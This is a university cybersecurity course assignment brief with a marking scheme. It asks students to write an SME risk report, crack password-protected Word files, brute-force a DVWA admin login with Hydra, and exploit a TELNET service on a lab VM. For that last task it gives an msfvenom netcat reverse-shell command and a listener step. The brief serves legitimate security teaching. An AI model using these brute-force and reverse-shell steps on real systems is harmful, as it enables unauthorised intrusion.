UNIVERSITI TUNKU ABDUL RAHMAN FACULTY OF INFORMATION AND

COMMUNICATION TECHNOLOGY

UCCN1213/UCCN1223 Assignment

Instructions:

1. This is a group assignment, group of 3 students MINIMUM OR group of 4 students

MAXIMUM. You can register your group here
2. Due dates: Week 6, 29 November 2022, before 5 pm.
3. This assignment is worth 20% of the coursework marks.

4. Guidelines for the format of the documentation:

• Headings should be capitalized, boldface, and left-aligned. • Line spacing
should be justified with single space.
• Document texts must be in Times New Roman size 12.
• Include a page number on each page.
• Spell-check and proofread your work.

5. Guidelines for writing the document:

• Assignment cover sheet as given on page 2 (contains title for this course, subject
code, student name and ID, programme (CN, CS, IB, IA, CT, DE) and the
practical group must be attached
• Marking Scheme as given on pages 3 & 4 (COMPULSORY to attach after the
coursework cover sheet)
• Write-up for Part A, Part B, Part C, Part D

6. This work should be submitted to Google Forms using your 1utar.my email
7. Plagiarism will guarantee you a failed grade.
8. Any student found not submitting the tasks will be awarded zero marks.
 UNIVERSITI TUNKU ABDUL RAHMAN
FACULTY OF INFORMATION COMMUNICATION TECHNOLOGY

OCTOBER 2022 TRIMESTER

UCCN1223 CYBERSECURITY

GROUP ASSIGNMENT COVER SHEET

Student Name Student ID Practical Group Programme Marks

Part A:
Part B:
Part C:
Part D:
Marking Scheme

Part A (5%)
Marks Allocated Marks Awarded

1. Introduction 1

2. Cyber security risks and threats 2

a. Identify and assess security risks, threats and
vulnerabilities
b. Prescribed procedures to evaluate risk levels and
the potential impact of threats and vulnerabilities
on SMEs

3. New proposal – Cybersecurity Strategy 2

a. Technical
b. Policy
c. Human
d. Cybersecurity Governance

TOTAL 5

Part B (5%)
File ID Marks Allocated Marks Awarded
1
File 1

File 2 1

File 3 1

File 4 1

File 5 1

TOTAL 5

Part C (5%)
File ID To-Do Marks Allocated Marks Awarded
Show nmap screenshots & explain 1
Step2
command
Write-up on hydra command & 3
Step5
parameter used (+screenshots)
Step6 Show the password 1

TOTAL 5
 Part D (5%)
File ID To-Do Marks Allocated Marks Awarded
Show your writeup 1
Step1

Step2 Show the welcome message 1

Step3 Show the screenshots on msfvenom 1

Show how you start a netcat and gain 1
Step4
reverse shell
Step5 Show the final flag value 1

TOTAL 5
Part A : Theoretical Research (5%)

Objectives:
1. To understand the cybersecurity risks and threats of SMEs
2. To propose information security protection mechanisms

According to Small Business Trend reports, 43 percent of cyber-attacks target small businesses. Only
14 percent of small businesses rate their ability to mitigate cyber risks, vulnerabilities and attacks as
highly effective and 60 percent of small companies go out of business within six months of a cyber-
attack. The number of malicious activities targeting small-to-medium enterprises (SME) has increased
dramatically in recent years. This represents a challenge not only to the customers who uses such
facilities, but also to the organizations who offer them, as evidenced by an ongoing trail in the US.
These malicious activities employ two kinds of attack vector – local attacks which occur on the local
computer, and remote attacks, which redirect the victim to a remote site. The possibility also exists
that both approaches will be combined. Some attacks may be foiled by adopting defense in depth
security measures. However, it is likely that the risks associated with SMEs will remain until security
countermeasures and awareness programs are widely introduced. And 48 percent of data security
breaches are caused by acts of malicious intent due to human error. Therefore, security policy,
awareness and training for the human sector is very crucial.

In this assignment, your security company has been hired by Cybersecurity Malaysia to undertake a
security review in relation to SMEs. In line with that, students are required to write a consultancy
paper about cyber security risks in SMEs. Your report should address the following: What common
cyber security risks, threats and vulnerabilities do SMEs face? And based on the thorough literature
review, you have to come out with a new proposal on how to overcome such risks and attacks.

Tasks:
1. Title
2. Introduction
3. Cyber security risks and threats
a. Identify and assess security risks, threats and vulnerabilities
b. Prescribed procedures to evaluate risk levels and the potential impact of threats and
vulnerabilities on SMEs
4. New proposal – Cybersecurity Strategy
a. Technical
b. Policy
c. Human
d. Cybersecurity Governance
5. Conclusion
6. References (Harvard Style Referencing and Citation)

References:
https://smallbiztrends.com/2017/01/cyber-security-statistics-small-business.html

Threat : a potential cause of an unwanted incident which may result in harm to a system or
organization

Vulnerability : a weakness in an asset or group of assets which can be exploited by a threat

Risk : the potential that a given threat will exploit vulnerabilities of an asset of group of
assets to cause loss or damage to the assets
Part B : Cracking Passwords (5%)

Objectives:

1. To understand the importance of password complexity

2. To understand how password complexity can make password cracking harder

In this assignment, you are given 5 different word files encrypted with different password
complexity. Some files are encrypted with simple short passwords. Some other files are
encrypted with password different combination of alphabets, symbols and numbers. Whereas
some files are encrypted with longer passwords. You need to decrypt each of these files and
write a report for each decrypted file. The files are included in the zip attached.
Part C: Brute-force Web Logins (5%)

Weak passwords are vulnerable to brute force attacks. Attackers can brute-force logins with a
list of known usernames and passwords using Hydra. As a hacker, your mission is to hack
into the DVWA server hosted in networkServices2.ova to discover the admin’s password.

Steps To-do Marks

1 Download and run networkServices2.ova and Kali Linux using Virtual box. -
The networkServices2.ova will act as the attack box for this challenge. You
will be using Kali to ‘hack’ this attack box.

Note: Set the network to ‘bridge’ mode for both kali and networkServices2
before starting them.

Note: Use your personal google account to download

2 There is a DVWA server hosted in the attack box. On Kali Linux, perform a 1
Nmap ping scan to find out the IP address of the DVWA server.

3 Ping to the DVWA server from Kali Linux (make sure kali can ping to the -
DWVA server)

4 Open Mozilla Firefox on Kali, then browse to the DVWA website using the -
server IP. For example, type http://1.1.1.1/dvwa/login.php to access the
server. (use the IP you found from step 3)

5 Use Hydra to brute-force passwords for the user named ‘admin’. You need to 3
write up a short paragraph on how you use hydra to crack; the wordlist you
used, and show the full command.

6 You should see the password for the user named ‘admin’. What is the 1
password of the admin user?

TOTAL 5
 networkServices2.ova

Part D: Exploiting TELNET (5%)

There is a TELNET server hosted in networksServices2.ova. Using the same server in Part C;
enumerate the machine to find out and hack into the TELNET server.

Steps To-do Marks

1. The TELNET server is hosted on a non-standard port to avoid detection. Use 1
nmap to scan for all hidden ports and find out the port number used by TELNET
(show the write-up)

2. On Kali Linux, try to TELNET to the TELNET server. Once connected, you 1
should see a welcome message. What is that message?

3. Generate a reverse shell payload using msfvenom on Kali. This will generate 1
and encode a netcat reverse shell for us. The example syntax:

msfvenom -p cmd/unix/reverse_netcat lhost=[local eth0 ip] lport=2233 R

-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

The output here is a command that will start a reverse shell.

4. Export the msfvenom output to the server via TELNET session. Then, start a 1
netcat listener on Kali and wait for the reverse shell from server. When the
server run the ‘attack’ from msfvenom, you can gain access to the server via
netcat.
5. After you gained access to the server via TELNET, you should see root.txt 1
which holds the final flag. What is the flag value?

TOTAL 5